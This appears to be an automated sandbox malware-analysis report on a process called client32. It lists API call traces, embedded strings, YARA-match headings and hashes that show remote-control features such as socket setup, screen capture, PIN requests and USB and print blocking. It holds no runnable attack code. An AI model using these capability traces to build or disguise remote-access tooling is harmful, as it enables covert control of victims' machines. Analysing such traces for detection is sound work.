                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
                                                                                                                                        • String ID: std::nullptr_t$volatile
                                                                                                                                        • API String ID: 2203807771-3726895890
                                                                                                                                        • Opcode ID: 6b84308bab2acdb725695dcada5386c048d5b74aa1d60a51cc96e68152486eb8
                                                                                                                                        • Instruction ID: 94cf04fbe957038e1feed0fd33eb98e88b3a54650a732462c35b2305be8684c4
                                                                                                                                        • Opcode Fuzzy Hash: 6b84308bab2acdb725695dcada5386c048d5b74aa1d60a51cc96e68152486eb8
                                                                                                                                        • Instruction Fuzzy Hash: 0141D432968119EFCB208F98C864DBF7BB8FB1A30CFC04465E9656725AC730DA41CB91
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 688FC158
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FC1A2
                                                                                                                                        • _free.LIBCMT ref: 688FC1E8
                                                                                                                                        • _free.LIBCMT ref: 688FC21C
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: AT=%d$CAP=%s$DEP=%s$FMASK=%d$FROM=%I64u$MAX=%d$ORO=%s$ORU=%s$TO=%I64u
                                                                                                                                        • API String ID: 3180605519-2647812726
                                                                                                                                        • Opcode ID: e20069b30f5ecf24976bd4cb7cea6b7945bb9095cb43d3bcf2666728fad7126c
                                                                                                                                        • Instruction ID: d708cad75fabaf7f8b7ae052334137a33f8686129305894bd139133945f87445
                                                                                                                                        • Opcode Fuzzy Hash: e20069b30f5ecf24976bd4cb7cea6b7945bb9095cb43d3bcf2666728fad7126c
                                                                                                                                        • Instruction Fuzzy Hash: C04192B96402187FE7029A25CC80F7F33ACDF96554F848919F82997642EB35EA01CBB5
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 689109A6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 689109C3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 689109CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,socket), ref: 689109DB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 689109E9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 689109F7
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 68910A6C
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                                                                        • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                                                                                        • API String ID: 2449869053-2279908372
                                                                                                                                        • Opcode ID: e7efd76d548f83fed70253e753d838196c5fe5638308f7130d5a4b2ba2459926
                                                                                                                                        • Instruction ID: 8b8d17fc65479ce4268178d8035ac035e6d5fabdbabb79cf3bc04277632377de
                                                                                                                                        • Opcode Fuzzy Hash: e7efd76d548f83fed70253e753d838196c5fe5638308f7130d5a4b2ba2459926
                                                                                                                                        • Instruction Fuzzy Hash: 4331C971B452286FDB249B748C59FEE77B8EF86314F404195F949A7280DB709D40CF91
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907BE0: _memset.LIBCMT ref: 68907BFF
                                                                                                                                          • Part of subcall function 68907BE0: _strncpy.LIBCMT ref: 68907C0B
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F622B
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,-000397EB,?,?,68902C4D), ref: 688F62AF
                                                                                                                                        • _strncpy.LIBCMT ref: 688F62E5
                                                                                                                                        • _free.LIBCMT ref: 688F62FB
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,68902C4D), ref: 688F631D
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_strncpy$EnterLeave__wcstoui64_free_memset
                                                                                                                                        • String ID: 1.0$CLIENT_NAME$CONNECTION_ID$FAILED_REASON$PROTOCOL_VER$RESULT$SERVER_VERSION
                                                                                                                                        • API String ID: 2226502904-1282845728
                                                                                                                                        • Opcode ID: a500e12cad25e66925296d7c2e6653e808ac332321dd8bdea8b4f1708e85e05f
                                                                                                                                        • Instruction ID: a8fce5a34a509da662a1494c10802b14c43881f26f93844f66419e0922d4509f
                                                                                                                                        • Opcode Fuzzy Hash: a500e12cad25e66925296d7c2e6653e808ac332321dd8bdea8b4f1708e85e05f
                                                                                                                                        • Instruction Fuzzy Hash: E04114B8D08625BBDF20DF68DC8097E7BB4ABA1354F904639E815DB200F331D65187A2
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 68907E8D
                                                                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000,00000000,00000000,00000010,?,?), ref: 68907E9A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 68907EB3
                                                                                                                                        • _malloc.LIBCMT ref: 68907ED8
                                                                                                                                        • _memmove.LIBCMT ref: 68907F20
                                                                                                                                        • _free.LIBCMT ref: 68907F31
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 68907F3D
                                                                                                                                        • _memmove.LIBCMT ref: 68907F5F
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library_memmove$AddressFreeLoadProc_free_malloc_memset
                                                                                                                                        • String ID: GetAdaptersInfo$cbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH$iphlpapi.dll$macaddr.cpp
                                                                                                                                        • API String ID: 3275914093-1155488092
                                                                                                                                        • Opcode ID: 8104237eca5a5221b94eeb4ca831f12d68e68daa6d9a10a983669790d78c9745
                                                                                                                                        • Instruction ID: 138a8a196c458c616918aa9a35acf883e974d0d6ed9fc09fc2d782cecd975f73
                                                                                                                                        • Opcode Fuzzy Hash: 8104237eca5a5221b94eeb4ca831f12d68e68daa6d9a10a983669790d78c9745
                                                                                                                                        • Instruction Fuzzy Hash: 6431A4B5E04218BBDB009EA89C84D9E777C9F85368F804568FE69E7340E731ED05C7A0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • _memset.LIBCMT ref: 6890141D
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901678
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 689016C8
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68901740
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6890175B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_memset$EnterException@8LeaveThrow_mallocstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: END_REC$MORE$RESULT$b
                                                                                                                                        • API String ID: 285166177-3141901015
                                                                                                                                        • Opcode ID: c957f03b506fc944c41f36d90b23b66a6ca926217c31905926c0f89e44359e75
                                                                                                                                        • Instruction ID: 8e0d54fb250e766c6679a6c0aa1f0f963f7ef2e1088b31270231892459db8c66
                                                                                                                                        • Opcode Fuzzy Hash: c957f03b506fc944c41f36d90b23b66a6ca926217c31905926c0f89e44359e75
                                                                                                                                        • Instruction Fuzzy Hash: F0B164B5D052699FDF20DFE8DC80AEEB7B4BF55308F80056EE456A6200E7359A48CB52
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11141AB0: _memset.LIBCMT ref: 11141AF5
                                                                                                                                          • Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                          • Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                          • Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                          • Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                          • Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                        • CreateWindowExA.USER32(00000000,NSMCltReplayClass,?,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 1105B226
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 1105B298
                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 1105B339
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 1105B2CD
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 1105B363
                                                                                                                                          • Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000003), ref: 1105B390
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ExitLibraryProcessUpdate$AddressCreateDefaultErrorFreeLangLastLoadMessageProcRectSystemVersionVisible_memset_strrchrwsprintf
                                                                                                                                        • String ID: CltReplay.cpp$NSMCltReplayClass$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_hWnd || !"CltReplayClass Window failed to create"
                                                                                                                                        • API String ID: 1774176861-1619494117
                                                                                                                                        • Opcode ID: 6bea5c09297829cbfb848c60cb5d7fef759d0651ead25e322a2e7de13e6ca9cc
                                                                                                                                        • Instruction ID: 79629effa54c5317598ac1fd62f88e21f554d2986a4eda5a7fee751a18d8bf94
                                                                                                                                        • Opcode Fuzzy Hash: 6bea5c09297829cbfb848c60cb5d7fef759d0651ead25e322a2e7de13e6ca9cc
                                                                                                                                        • Instruction Fuzzy Hash: D0518D74B00706ABD760DF64CC81FAAF3B9BF44708F108568EA56AB685DB30F944CB94
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6891024A
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6891025F
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 68910276
                                                                                                                                        • InitializeCriticalSection.KERNEL32(-0000000E), ref: 68910289
                                                                                                                                        • InitializeCriticalSection.KERNEL32(6893D004), ref: 68910298
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893D004), ref: 689102AC
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 689102D2
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893D004), ref: 6891035F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: 0/#v$QueueThreadEvent$Refcount.cpp
                                                                                                                                        • API String ID: 1976012330-2768430589
                                                                                                                                        • Opcode ID: 677f1b10091fd94332061f2b16abca3370edd4866483fe6ca2b5de8204f76fef
                                                                                                                                        • Instruction ID: 2dd53814fc0783dfda238ce1ead6ea93c6b40cbf9d0e17cd2dd7e677189e4e54
                                                                                                                                        • Opcode Fuzzy Hash: 677f1b10091fd94332061f2b16abca3370edd4866483fe6ca2b5de8204f76fef
                                                                                                                                        • Instruction Fuzzy Hash: 5941D271A4C628AFDB21DF698844A6EBBF4EB95708F80452EE446D7340E775D900CB51
                                                                                                                                        APIs
                                                                                                                                        • RegisterClassA.USER32(111E9674), ref: 1105D1F2
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        • CreateWindowExA.USER32(00000000,NSMCobrProxy,11190240,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1105D233
                                                                                                                                        • SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 1105D2BD
                                                                                                                                        • GetMessageA.USER32(00000000,?,00000000,00000000), ref: 1105D2E0
                                                                                                                                        • TranslateMessage.USER32(?), ref: 1105D2F6
                                                                                                                                        • DispatchMessageA.USER32(?), ref: 1105D2FC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
                                                                                                                                        • String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
                                                                                                                                        • API String ID: 13347155-1383313024
                                                                                                                                        • Opcode ID: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
                                                                                                                                        • Instruction ID: 0f733430d951bad01d0579ae861b00247f75b5e4436af6dec06e8f89504007ad
                                                                                                                                        • Opcode Fuzzy Hash: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
                                                                                                                                        • Instruction Fuzzy Hash: 3341F1B5E0074AABD761DFA5CC84F9FFBA5AB44758F10842AF91697280EA30E440CB61
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getptd
                                                                                                                                        • String ID: MOC$RCC$csm$csm
                                                                                                                                        • API String ID: 3384420010-1441736206
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 688FC3C8
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FC412
                                                                                                                                        • _free.LIBCMT ref: 688FC458
                                                                                                                                        • _free.LIBCMT ref: 688FC48C
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: AT=%d$CAP=%s$DEP=%s$FMASK=%d$MAX=%d$ORO=%s$ORU=%s
                                                                                                                                        • API String ID: 3180605519-3721514808
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 68909136
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 6890913D
                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000), ref: 68909153
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 68909171
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 6890917B
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 6890918E
                                                                                                                                        • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),6893A2F0,00000004,?), ref: 689091AD
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 689091D4
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 689091DB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
                                                                                                                                        • String ID: ProcessIdToSessionId$kernel32.dll
                                                                                                                                        • API String ID: 2536908267-3889420803
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 68905E36
                                                                                                                                          • Part of subcall function 689033A0: wsprintfA.USER32 ref: 689034FD
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __vswprintf_memsetwsprintf
                                                                                                                                        • String ID: %02X%02X%02X%02X%02X%02X$0x0x0x0$305090$>???.???.???.???$CLIENT_NAME=%s$CMD=CLIENT_PIN_REQUEST$CMD=CONTROL_PIN_REQUEST$PINserver
                                                                                                                                        • API String ID: 518437271-2187247375
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 68907F9F
                                                                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,?,?,?,?,?,?,?,?,688FB916,?,00000100,00000006,00000001), ref: 68907FAC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 68907FCB
                                                                                                                                        • _malloc.LIBCMT ref: 68907FFB
                                                                                                                                        • wsprintfA.USER32 ref: 6890807C
                                                                                                                                        • _free.LIBCMT ref: 68908110
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 6890811C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary$AddressErrorHeapLastLoadProc_free_malloc_memsetwsprintf
                                                                                                                                        • String ID: %02X%02X%02X%02X%02X%02X$GetAdaptersInfo$iphlpapi.dll
                                                                                                                                        • API String ID: 1404005415-834977148
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D27F
                                                                                                                                        • IsA(), xrefs: 1103D284
                                                                                                                                        • BLOCKPRINTING, xrefs: 1103D23D
                                                                                                                                        • RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103D262
                                                                                                                                        • BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103D25B
                                                                                                                                        • SETUSBMASSSTORAGEACCESS, xrefs: 1103D1E3
                                                                                                                                        • SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103D22F
                                                                                                                                        • SETOPTICALDRIVEACCESS, xrefs: 1103D214
                                                                                                                                        • SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103D206
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                        • API String ID: 4104443479-1830555902
                                                                                                                                        • Opcode ID: 716790659bc5e28ebd22f7d0de68d033308c6e41a7c472bc21094ad78cf4f8bb
                                                                                                                                        • Instruction ID: 0533b61ff5f256c00753904ec1df5a7198c5ed9dcfad6114a4b50a325be8fdd6
                                                                                                                                        • Opcode Fuzzy Hash: 716790659bc5e28ebd22f7d0de68d033308c6e41a7c472bc21094ad78cf4f8bb
                                                                                                                                        • Instruction Fuzzy Hash: BE41B779A1021AAFCB01CF94CC90FEEB7F8EF55319F044569E855A7241EB35E904C7A1
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 1114F203
                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 1114F219
                                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F2FF
                                                                                                                                        • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 1114F327
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 1114F33B
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 1114F361
                                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F371
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 1114F378
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 1114F387
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                                                                        • String ID: @Ls
                                                                                                                                        • API String ID: 602542589-4225762999
                                                                                                                                        • Opcode ID: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                                        • Instruction ID: f8b28bdea48ec2611b1f91f2bbafde9b68da4a4719e2569757cfb30afdba7c1c
                                                                                                                                        • Opcode Fuzzy Hash: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                                        • Instruction Fuzzy Hash: 7851DAF5E012299FDB60DF28CD8479DBBB9EF88604F5091EAE609E3240D7705A81CF59
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • PostMessageA.USER32(0000FFFF,0000C15F,00000000,00000000), ref: 1104B225
                                                                                                                                        • PostMessageA.USER32(0001044C,0000048F,00000032,00000000), ref: 1104B256
                                                                                                                                        • PostMessageA.USER32(0001044C,00000483,00000000,00000000), ref: 1104B268
                                                                                                                                        • PostMessageA.USER32(0001044C,0000048F,000000C8,00000000), ref: 1104B27C
                                                                                                                                        • PostMessageA.USER32(0001044C,00000483,00000001,?), ref: 1104B293
                                                                                                                                        • PostMessageA.USER32(0001044C,00000800,00000000,00000000), ref: 1104B2A4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$__wcstoi64
                                                                                                                                        • String ID: Client$UnloadMirrorOnEndView$tVPq
                                                                                                                                        • API String ID: 1802880851-2026197083
                                                                                                                                        • Opcode ID: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
                                                                                                                                        • Instruction ID: 72b0dfb70f0a874fb1e004092d90b5695b323917c743566986231bfe2b7fd1fa
                                                                                                                                        • Opcode Fuzzy Hash: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
                                                                                                                                        • Instruction Fuzzy Hash: E6412775B025257BD311DBA4CC85FEBB7AABF89708F1081A9F61497284DB70B900CBD4
                                                                                                                                        APIs
                                                                                                                                        • _memmove.LIBCMT ref: 6890783E
                                                                                                                                        • #16.WSOCK32(?,?,?,00000000), ref: 689078F6
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 68907924
                                                                                                                                        • wsprintfA.USER32 ref: 68907937
                                                                                                                                        • OutputDebugStringA.KERNEL32(?), ref: 68907944
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DebugErrorLastOutputString_memmovewsprintf
                                                                                                                                        • String ID: $(Httputil.c) Error %d reading HTTP response header$hbuf->data$httputil.c
                                                                                                                                        • API String ID: 2214935655-769711038
                                                                                                                                        • Opcode ID: 6b55fe3e7b05f5130deffd2513c3b15d327cdbe1c71d77648d102975681e9eef
                                                                                                                                        • Instruction ID: 2f61cffe9041ed912316b2d66fab2e1e69b47a01639e0f51311a7c78d351ec7a
                                                                                                                                        • Opcode Fuzzy Hash: 6b55fe3e7b05f5130deffd2513c3b15d327cdbe1c71d77648d102975681e9eef
                                                                                                                                        • Instruction Fuzzy Hash: 69419879A04605AFD720DF68CD45E6BB7F9EF59318B40882DE89AC7641E731F805CB90
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(wininet.dll,00002000,00000000,00000000), ref: 688F6ABD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 688F6ACF
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 688F6AFC
                                                                                                                                        • wsprintfA.USER32 ref: 688F6B52
                                                                                                                                        • _free.LIBCMT ref: 688F6B96
